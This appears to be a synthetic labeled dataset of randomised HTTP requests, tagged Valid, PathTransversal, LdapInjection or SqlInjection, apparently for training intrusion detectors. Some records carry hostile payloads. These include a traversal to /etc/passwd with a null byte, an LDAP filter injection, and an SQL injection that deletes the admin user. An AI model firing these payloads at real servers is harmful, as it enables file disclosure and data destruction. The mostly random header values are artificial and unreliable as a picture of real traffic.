GET /aNn/rstjtmaell/f3O1I0/kTfezve5edefdyeyly/l9qbyT/7IFmI/newnenoEmueswz4dl8e/ee7/LGpNvewindow.openihKw/jadmin5KB14JYu/WSAO3ziHcyimgcz/o0pezcysde.mdb?ribfpshwhtg=4lS&vqwr2r=yeTtw&uzMLSiSTNvvi=48&Cs3eAhR=hertoe&er=aQ2_b%40oYh9U-&T9imfIlru=117960361&loln8esjohena=52&dtnNiES82eome4=utud%40wrlibtisgroup+byi%5Dix&ezz=64217&Ia=691242&x8Cu=dsudelete&niaoal3nugewh=91&qhupsadr=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&M3SF78iframeJ=oj+%3A HTTP/1.0
Host: 244.182.37.114
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Bne-e6k;q=0.7, s7cxdDH-cctcbdtR;q=0.4
Cache-Control: no-cache
Client-ip: 224.10.85.108
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="289"
Date: Mon, 29 Sep 08 07:20:01 CET
ETag: "cQMsIfUhw.QoAzR."
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: Ihr6Rfcs='h'
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Digest uri=http://jnnte.ch/cre5lhut/onigo/0t2iftsi/AfeeT.mpeg
Range: -99,17-4389
Referer: http://www.gsoa.cz/anu0N/rtitRr/crnlient/IBNetwu.sh
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (X11; U; Linux i386 8.6; s5-cr; rv:2.2.4) Gecko/79394199
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/0.2 www.sRNsgg.html, ujfcs/2.6 www.sqyen.shtml, 7.3 www.8edleuoe.css:4
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 194.255.26.137
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46272
Start - Id: 15524
class: Valid
GET /s8BDkdMSMW.css?iso4Nagdoeareia=ibnttncethv HTTP/1.1
Host: www.neofsIhy.de:80100
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=18489
Client-ip: 210.248.209.57
Cookie: 2..Jhn=esam0dstdinfe0+slgaGss0ma;pa65=challl1oD$\Anode
Cookie2: $Version="524"
Date: Wed, 05 May 10 02:40:13 GMT
ETag: W/"HfjNRiPZAw7WYjax@q"
Expect: svCnr
From: seean@8ua2seurko.de
If-Modified-Since: Wed, 25 Jul 07 10:22:43 GMT
If-Unmodified-Since: Fri, 17 Dec 04 17:57:12 CET
If-Match: "jh8MZHTWurJap1GPKi"
If-None-Match: "e@FUS8QgxXnRGCd2T"
If-Range: *
Max-Forwards: 962
MIME-Version: 6.7
Pragma: iskNeben=oHrt
Proxy-Authorization: NTLM aXNlYWx0eWRvbThoYTVkZWFvVXRtaXNhd2RVZWRtbTBs
Authorization: knitk nsiixrl=eaSsrca
Range: 253580-
Referer: /rynln/aeiu.cfm
TE: trailers,deflate,gzip;q=0.9
Trailer: User-Agent
User-Agent: tTiiIuhaaptEavdyte
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3257x239
Via: 0.7 www.onpMio.jpeg, HTTP/3.3 192.139.28.173, 1.0 180.214.128.69
Transfer-Encoding: compress
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 748 145.153.150.169 "3xejD" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15524
Start - Id: 3143
class: Valid
GET /gL4/e4t/bpwanemrti7gTd/1vnae/eXH/zDou/8rdAyOssbiwnfaoe6w/oPOImfHEZYm0WHKdp/r0schbteMe6qld/8fusnAt3ucohwDdti.gif?dgN0puumnao=ae%26%3F%2Fand&LRZDSfR8=tPWD.R-EwP&uldsa0er=37 HTTP/1.0
Host: 93.34.252.162
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a-rsettgtF;q=0.7, i1mra-eape;q=0.9, q-wth
Cache-Control: max-stale=8
Client-ip: 179.176.204.119
Cookie: h8otmqe=;oi;phpzrw8gE=(ksc/niaej ;.D2pOjt=82311827;vltiframeXS=50
Cookie2: $Version="69"
Date: Fri, 22 Jul 05 17:42:20 CET
ETag: "-AJ3BvKDQiLoGn3w"
Expect: itcgr
From: dr3e@eJNrt.cz
If-Modified-Since: Tue, 24 Feb 09 11:56:31 CET
If-Unmodified-Since: Mon, 01 May 06 13:13:45 UTC
If-Match: *
If-None-Match: "34zhw4YB4T0ebsYc"
If-Range: Mon, 29 Jan 07 05:20:29 CET
Max-Forwards: 049
MIME-Version: 7.8
Pragma: u7=a2uhz
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM cmFyYWVyRWRldGxhYmgzb0poZWlrclRlaHpuYXhpZ3IyaW9paWVIZWR0
Range: -33546
Referer: http://www.oepelteI.be/5seaN/7eduoty/pt4ue75O.nsf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: lzeraie (rEjx6.lW)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5717x5114
Via: 5.7 86.102.251.245
Transfer-Encoding: identity
Upgrade: da2wHl/3.4, ndo/3.7, pReoct/8.9, s4knn1/0.1
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 545829621
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3143
Start - Id: 6487
class: Valid
PUT /tUQjLJjlntW.U60ODOd4/85TT@/eSId/uyhhno6phoa8fefe/trhNFJu-iit88q2w/sWdf/4e/brcsoo4a6eaihn/bpxav8wTGp-BOCqQ/aEe/eWW3FjKsa08mNti63_r/A2aetmtne.cgi? HTTP/1.1
Content-Length: 202
Content-Language: tojditpf,5reo8a,Ehh9
Content-Encoding: gzip
Content-Location: http://lsie.it/lNbirr/hoEsrT/myioefh/EKoxm/vtiTrth.gif
Content-MD5: ZWhsUm9pc2FlcHVvd0hOcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Jun 09 12:45:42 GMT
Last-Modified: Wed, 18 Feb 09 15:13:39 UTC
Host: www.ti5txs.de
Connection: keep-alive
Accept: image/*, audio/basic;q=0.1
Accept-Charset: cp-932;q=0.7
Accept-Encoding: *
Accept-Language: a7dbs-2esbx
Cache-Control: max-stale=57232
Client-ip: 194.233.104.97
Cookie: ieho9totuf=e;mioessai4lwa=?n<rna=lhif4ai o+nf;nteeiaa=uead;iT0seda9nh=98590360
Cookie2: $Version="35"
Date: Fri, 06 May 05 24:06:12 UTC
ETag: W/"5sjzxyImGgaE2KPWKN"
Expect: 100-continue
From: y1ll@nCpnthborc.fr
If-Modified-Since: Thu, 07 Feb 08 22:58:27 CET
If-Unmodified-Since: Thu, 28 Apr 05 13:05:32 UTC
If-Match: "gE5cg6ytgMoiiAw8"
If-None-Match: *
If-Range: Thu, 06 Dec 07 05:51:47 GMT
Max-Forwards: 9
MIME-Version: 0.2
Pragma: 0toroa=ostE
Proxy-Authorization: Digest cnonce="srqEeu"
Authorization: NTLM aWNzcGVuaWdsc3p0dGRhc3V6dWhxMkFFYjJpaHR5bm9JMm50cQ==
Range: -4055
Referer: /esgsga.exe
TE: chunked,gzip;q=0.3,chunked;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (compatible; Konqueror/6.9; Mac OS X; eTlbigaepE; xuefYdnr; vD8kr)
UA-CPU: Sparc
UA-Disp: 535,2625,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3689x7049
Via: HTTP/7.0 41.179.212.142, 2.5 www.onEeurs.jpeg, FTP/3.0 29.132.136.137
Transfer-Encoding: compress
Upgrade: ropcwa/9.2
Warning: 330 www.oaieioL.png:8 "3tprg" 
X-Forwarded-For: 25.241.101.9
X-Serial-Number: 91454032929892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

wtneoepimahrsd=4&nnarydceftyfn=rptdofhpLme1o&5-u.ncM9YZO=ftn7tltsbTner&piEeisRMavtnnt=r%u&nddb2eaea6eote4=5rtmp5yoia2s&yaUeAecent=raXnoaou1a&iceaa=063&rezreCh=nis&3il=77&iadtOccer1Cd=017&qihn1n6p=0972

End - Id: 6487
Start - Id: 33726
class: Valid
PUT /DH8g5lexec17dDU3U.gif? HTTP/1.0
Content-Length: 167
Content-Language: ihyenidk,quo1pqc,6fthf6b
Content-Encoding: compress
Content-Location: http://www.mehghrx.fr/heomei/aoup0s.css
Content-MD5: aWF4bmFyb1M0V2owRW5odA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Dec 04 24:04:33 UTC
Last-Modified: Mon, 14 Dec 09 20:00:05 CET
Host: www.mbUmxlecu.cz
Connection: Sh33l8
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 28.155.60.249
Cookie: merdtoVqrkIg=eo2eHadnnd;neFio=10;e72ewn=aMyJUhrqW3
Cookie2: $Version="284"
Date: Fri, 08 Aug 08 18:06:20 UTC
ETag: "Nyk.tdd8xGa5-nMk"
Expect: 100-continue
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Sun, 23 Oct 05 06:15:03 CET
If-Unmodified-Since: Thu, 05 Feb 04 16:44:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 07
MIME-Version: 5.8
Pragma: e8oo1=lnqner
Proxy-Authorization: NTLM OVN2RW51NGhhYjd5U3BjUGU2cGFhZ2FEbGl5bzJlc251cjVp
Authorization: Digest cnonce="otlT"
Range: 666-,61-39
Referer: /de0rsa/siuiEA.mdb
TE: trailers,trailers,deflate;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/8.3 (Windows; U; Win98 8.5; ne-gr; rv:9.7.9) Gecko/03193232
UA-CPU: StrongARM
UA-Disp: 9133,083,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 520x205
Via: 8.1 4.34.233.82, 6.1 245.224.38.40:85, FTP/1.0 226.26.118.28:804
Transfer-Encoding: identity
Upgrade: Xccd/0.2, esdaz/5.3
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

urqcoresdg=or&Vtvio=rwe&etcmg-jMGNIddX=308&3hs7=8dropfeX&liwEtlomaoigns=aidee&csFnndw3azel1ts=184041&ae=wHysAo&nat=sa  o&oe8eb=96&grtzrj=v&ia0eoi=os&hNhtUffMpnt4an=h5i

End - Id: 33726
Start - Id: 44725
class: PathTransversal
PUT /y2/eerojai.tiff? HTTP/1.1
Content-Length: 230
Content-Language: ehcbitr,sibndo
Content-Encoding: deflate
Content-Location: http://Eegun.com/uae9at/shtpym/oYybo4Uo/trqtc.asp
Content-MD5: enRpaXFrcGE4c2FoZGFidA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 14:54:25 GMT
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: 155.101.214.249
Connection: s9rc
Accept: video/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: VrhHhsn-6utN;q=0.3, noto8sSr-gtrt, a-oeca7ea
Cache-Control: min-fresh=5
Cookie2: $Version="8"
Date: Thu, 27 Sep 07 07:50:30 UTC
ETag: "nDW.3xXQFDtpZ72"
Expect: 3tnOdwe7=nohiayee
If-Modified-Since: Fri, 15 Aug 08 02:55:37 GMT
If-Unmodified-Since: Mon, 19 Mar 07 13:13:47 UTC
If-Match: *
If-None-Match: "@uzshwqJtWXym8e"
If-Range: Tue, 12 Jun 07 16:58:49 GMT
Max-Forwards: 1605
Pragma: eyien=8ns
Authorization: Digest nonce
Referer: /rqoeoi42/oedvuqs/bnia.cfm
User-Agent: eIsg5dfeb/2.9.5.1
Via: htn/1.6 www.bHid.jpg, 8.7 241.137.9.191, 9.4 188.109.92.187
Warning: 204 40.231.234.46 "eLujf" "Wed, 31 Dec 08 20:00:10 GMT"

mESmdsi=./../../../../../&trhmftertustynt=8XEEaGOA@&daef4wio7IzEe=csceszc&IOtdiohyyc=tMGq8NzP4.G&efnzut2aapeiql=348314&luvfvtrntjvay=hiobeysbdwm7mt&eoedinun=igsinoRnblt9rtyef&aylOeeie=2a7?uc0db9 (h&ootumoy=344016

End - Id: 44725
Start - Id: 30244
class: Valid
GET /S3aRieeorhenmnuhp/6BzGGMn.vv6x@Xs0eKB/isei6Rw3o/egsmamenqx9t/2utpQmeJbn/ndr2emoTltir78e/4us5iYnEi4gos.swf? HTTP/1.0
Host: www.ksytrnh.it:80
Connection: close
Accept: audio/x-wav;q=0.0, text/plain, image/jpeg;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: hTo-ntsaeP0;q=0.6, ste-ltcjpe4s;q=0.5, h7-1tietiog;q=0.2
Cache-Control: max-age=2
Client-ip: 137.153.206.248
Cookie: tttLto5opasthes=a|s;cgcytm=44076;SameCrdrajoe7=tnVvcKS;7QuCcmd2aunionnMnE=lntallpmt
Cookie2: $Version="0"
Date: Mon, 17 Nov 08 02:18:17 GMT
ETag: W/"9_wSeyt.1K7kMD0jBjn"
Expect: eela4=sEBd;adspdrga=rahfE
From: OtuSewg@hqerotci.biz
If-Modified-Since: Thu, 02 Dec 04 03:56:29 UTC
If-Unmodified-Since: Sat, 02 Oct 04 20:17:16 GMT
If-Match: "N@2VoZbAymZ8hvXyl5"
If-None-Match: *
If-Range: "LG2P8jGM@Q_80ovj4um."
Max-Forwards: 9416
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic bGV1Nzpvc3RlZXQ=
Range: 65-5915
Referer: http://www.tsooI.net/tieoy0z/ql7oo/Ecte/erT1T.tar
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (compatible; MSIE 2.9; Linux i386; 9v02he; yQnldopn)
UA-CPU: Sparc
UA-Disp: 2135,180,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: 7.1 www.vametok.css, FTP/5.3 16.58.137.152:86926, 1.6 www.1omori5.htm
Transfer-Encoding: identity
Upgrade: 92ti/2.3, helqbf/3.9, e7crte/0.3, xhgFid/0.0, a5e/8.9
Warning: 983 www.fote.png "aoae0m" "Sun, 18 Jan 04 18:57:24 CET"
X-Forwarded-For: 27.179.187.38
X-Serial-Number: 72373048649993
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30244
Start - Id: 37028
class: LdapInjection
GET /8Esanerrpamzpentee/axGyGgGPkP@/w6t1aM/w-/gsuadeN/cYQ/QRNALPxr7B.jsp?8rts=aHhwnwTT&su0lsiQih7lc=%27amovytsGx8%29+&nlmn=783%29%28%26%28objectClass%3Drwhs%29%28%7C%28sn+%3D++++xeei%29%28cn%3DTie+J*%29%29 HTTP/1.1
Host: www.gcoz.it
Connection: keep-alive
Accept: text/*, application/rtf
Accept-Charset: macintosh, windows-1253, windows-1254, euc-kr;q=0.0, iso-8859-5;q=0.2
Accept-Encoding: gzip, compress, compress, compress;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 201.0.26.84
Cookie: cevdOs2oj=enenor@belt'ty ;alhboln=1849;mpzRxyGCTOD=x6GSrUo.;ronmnn3ecerkr=770;duUl6daj= t
Cookie2: $Version="984"
Date: Sat, 18 Oct 08 19:11:19 GMT
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 11 Jun 05 14:55:03 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 9
MIME-Version: 3.0
Pragma: oh03=8uc
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: http://uiA0it.st/tsEo8.gif
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.0 (Machintosh; U; Mac OS X 2.9; 2n-to; rv:5.5.2) Gecko/96304873
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 0.7 204.253.165.17
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37028
Start - Id: 42706
class: SqlInjection
PUT /lrtez8e6m/2m5-AymA6@6yA/ro/m-KHH/qPbfeassreNfdnt/VFaccess_logsrcpD94qY9/sIl.3IPFK37G1jm6k5v.tiff? HTTP/1.0
Content-Length: 259
Content-Language: adic,76
Content-Encoding: deflate
Content-Location: /g2b5o/wsuntMX/ecqN/edmlet/iuqoot.txt
Content-MD5: b2E4ZWRyb2hzYm1kaTBPYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 12 Jan 08 08:18:13 GMT
Host: 139.170.94.125
Connection: keep-alive
Accept: image/*, audio/*;q=0.3, text/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: qwer' or   nne_v.Account='odo40gxq@eb.com
Cache-Control: no-store
Client-ip: 228.125.37.130
Cookie: 1Itm=srtssRsE6t7hinte;KZo3QNXTXacceptvk=fXCo@ZVQ;atrHmoaosEgbsoO=seopacceptu9Oaadistf8xterm\;tsReo323e8ne=8aaa
Cookie2: $Version="3"
Date: Mon, 10 Nov 08 17:03:16 UTC
ETag: W/"AZn3Yd1aCW924Iy"
Expect: ydtvhiN
From: leyen5sh@mOloiam5r.biz
If-Modified-Since: Tue, 15 Jan 08 10:19:38 CET
If-Unmodified-Since: Mon, 14 Jul 08 15:07:42 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic Z3Q1ZHZvSTp0c29ubw==
Authorization: Digest opaque="tote0oHe"
Range: -952,0696-,189-4
Referer: http://edr9.st/InLeaep5/yggo7/a3paSee/eRsr.aspx
TE: gzip
Trailer: TE
User-Agent: Mozilla/8.7 (Windows; U; Win98 5.0; Fh-mi; rv:7.4.3) Gecko/48054330
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: fn41vs/8.5 171.33.154.48:90, tsa/9.7 www.itRUeoan.jpg
Transfer-Encoding: compress
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 987 208.120.245.13 "dsnf" 
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hi=52929&eemt= P\etctmpscdida&DseaEi78krtE=tmpnulloapa|aitoMro&tiemErro86Rrtgu=1&YDViusraQ=;l6@q&htre82ugnu=drtrnmTnlib&dqXjrmZWaJ=l2e eEee&Ieihobzais=eye sen&Fhi5s1=anuZid&nx2c8n=26302&bt0neemytar=el1Ta&eFWh=043451&hNAaerrthycoOih=?hsO&h2gf=eicaais

End - Id: 42706
Start - Id: 24356
class: Valid
GET /cGABuWwXj4LxwW/a5-W0CoHPRB-/dodk3G3tHXHDg/diyob4oiOrg/lnpS/hda/reeosdtnea/yewstvwU8J/sZ1E9ZVB67Y8xijHeQr6/uwindow.openZstelnetm6WU8Xyxp_q/a9oFbiargv.php4? HTTP/1.1
Host: 112.200.110.167
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: oasvols-Hixrsdru;q=0.7
Cache-Control: no-cache
Client-ip: 114.108.65.238
Cookie: dhn4tarbl=4603;dwoh0nsdt=evG5;miJwua8=uiy3 gl\nph-fxadx6=h
Cookie2: $Version="7"
Date: Thu, 05 Oct 06 14:27:25 CET
ETag: W/"iGg4GyFoonVM8sn"
Expect: xEoesret=heriSe
From: 5hRu@STpwssetis.be
If-Modified-Since: Sat, 29 Oct 05 03:40:06 CET
If-Unmodified-Since: Tue, 21 Aug 07 14:53:49 CET
If-Match: "RuNHC@wzTGCZV_n88"
If-None-Match: *
If-Range: "ivQemFmBM.Yo9lMU"
Max-Forwards: 83
MIME-Version: 5.2
Pragma: RahasOc='puls7ih'
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: tgii7t 6heesirh=sretjt
Range: -290,922508-,-602
Referer: /aepae/s8ayStz/9saoiy/hDerh2eA/emetE9.jsp
TE: trailers
Trailer: User-Agent
User-Agent: szr7ro http://www.tymEn.uk
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: HTTP/4.7 www.5i7Bc26v.tiff, 7.2 www.ssvoOg.tiff
Transfer-Encoding: identity
Upgrade: neBei/6.4, t4neei/6.4, Iaotdt/0.8, ennr/7.0
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24356
Start - Id: 35328
class: SqlInjection
GET /pttswhsarg4aiitfst/aft/nmRRk1acjfMvkuVBq/7oc0/9T6EkMU@HETkeS/rtdnifele/pDbgsoundM/sdmloe/kM/lqIzy/oHJ19xjMyBaVT.gif?itirmstan=sg%27%40%5Cyecht&iewo7=9Onh%27+%29%3BDELETEFROMusersWHEREupper%28username%29%3D+++upper%28+%27admin HTTP/1.0
Host: www.ICuu.st
Connection: keep-alive
Accept: application/x-tar;q=0.4, image/gif, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: ObnIemit-gro1al, k1ni2E5-toiEtkNr;q=0.3, srRosgit-q;q=0.3
Cache-Control: no-store
Client-ip: 108.43.219.139
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="139"
Date: Tue, 09 Mar 04 07:23:20 CET
ETag: W/"Vwc@cyCG1aygn@1E8xdw"
Expect: 100-continue
From: atozRhO@AwAlyrse.it
If-Modified-Since: Sat, 24 Dec 05 09:15:00 CET
If-Unmodified-Since: Sat, 27 Aug 05 21:39:06 CET
If-Match: "RH1RblP.Hwhs_8t-3EW5"
If-None-Match: *
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 7698
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Basic VUVtdDplZWF2aGU=
Range: -699332,-7572
Referer: http://www.3knn.ch/hinMn6f/1einrtr.js
TE: trailers
Trailer: Via
User-Agent: eizxdOr
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: FTP/4.0 26.109.203.24, FTP/4.7 www.ehLeeM.js, zyd/0.2 www.heeeeco.gif
Transfer-Encoding: fosip
Upgrade: see/8.7, jebi/8.0
Warning: 635 237.151.216.13:8 "tstkg" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35328
Start - Id: 33549
class: Valid
POST /hthEeoreEeehmaCicsll/nn1so7IZLwG4tAMR5/connectuu.w75_php0JCEiframe/2Lioeeikshiutcit7o/gmi2@CO3cmy0d/0MJj/lzPEY0GZBHakqo8/sPHZaiF/ryTmNaKXyG9nHsFqKoS.tiff? HTTP/1.0
Content-Length: 291
Content-Language: rtrl,e1twle,4ssHo
Content-Encoding: identity
Content-Location: http://rietoio2.st/elmwf/mvhTvtwE.txt
Content-MD5: cndocTMzZWFMeXVmYWhocw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Nov 04 14:05:49 CET
Last-Modified: Mon, 11 Oct 04 15:19:59 UTC
Host: 172.146.213.204
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ywiTd-3l6y9mhx;q=0.8, arfacqkt-a6yui, a-gs1sae;q=0.5
Cache-Control: max-stale
Client-ip: 0.41.137.37
Cookie: dqsD7P=016439313;uZmlsx8=LaemyEm t4ouni
Cookie2: $Version="946"
Date: Sun, 23 Oct 05 08:56:10 UTC
ETag: W/"ScDd.lTcUfGgCNycb"
Expect: tk1od=qaaS7t;imlT2gn
From: nndz@n7ls.fr
If-Modified-Since: Thu, 28 Oct 04 16:14:36 GMT
If-Unmodified-Since: Sat, 12 Mar 05 01:29:51 UTC
If-Match: *
If-None-Match: "R_n5UKWb6y.CHaujnaV_"
If-Range: Wed, 21 Jul 04 05:31:19 CET
Max-Forwards: 3
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: iegu ssseMwrr=mwsot
Authorization: Basic bTRnYWFlZTp1dzRzeGt3NQ==
Range: -842
Referer: http://hlyotfEo.it/0gnennu.pdf
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 4.6; rN-ln; rv:7.2.0) Gecko/87975762
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 417x756
Via: 7.8 93.168.16.55, FTP/3.3 www.at7mn.css, FTP/5.6 59.172.0.89
Transfer-Encoding: compress
Upgrade: ISrcs/4.9, Gqo/4.9, rzorSu/0.2, remnis/8.6, ulste1/0.7
Warning: 643 www.ra6U.htm:54672 "saen" 
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 4054384
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oloa6e=oaety&dropxB5Yw@rdeleteEh=795870&XSXaO08C8k=hXXlxhLx5Bd-&ioaiareaed=91996&eexec8geIcpassthruM=0983&enaoHDebh4nchx=7452249&lbrtb5sepens=01928412&8sc=od&irkIrnerent=12935609&1tthcihehiy=elObataoac&a4eighkaodrs=8857&acst=oriNjBUOnDpi&TfJnKshtacces=33012&5owb=ecpimIiJs&Mne=xenyHaltnGSwcy

End - Id: 33549
Start - Id: 12386
class: Valid
GET /Ihttps@Z7HZ4g1/tv/gzv4m@bOEjjttk.I8.php3? HTTP/1.0
Host: 251.114.149.188
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-950, x-mac-chinesesimp
Accept-Encoding: *;q=0.4
Accept-Language: g7tod-hh, hao-b;q=0.9, nl4o-ioAeBhol;q=0.7, e-fl4sctea;q=0.7
Cache-Control: no-cache
Client-ip: 63.40.194.81
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="00"
Date: Mon, 26 Nov 07 05:15:59 GMT
ETag: W/"xcdyGu8n9CfUFeFjthXj"
Expect: 100-continue
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Thu, 25 Mar 10 19:44:38 CET
If-Unmodified-Since: Thu, 28 May 09 16:28:41 UTC
If-Match: "nrH_Ohe_7rpNDmO0U"
If-None-Match: "DoG5IlGMY0f4XLd1pU4k"
If-Range: Wed, 23 Sep 09 04:29:55 UTC
Max-Forwards: 34
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="oiaj"
Authorization: NTLM QVRpYXVxZHlvbWl0aWRjeWFzMHdpc2Fhbm90ZnRlNm9mb3pUaGkycA==
Range: -51069
Referer: /exlsO/aiemtn/nioAo.ace
TE: trailers,deflate
Trailer: Connection
User-Agent: l9sx3M http://www.rljdrpe.ch
UA-CPU: 68000
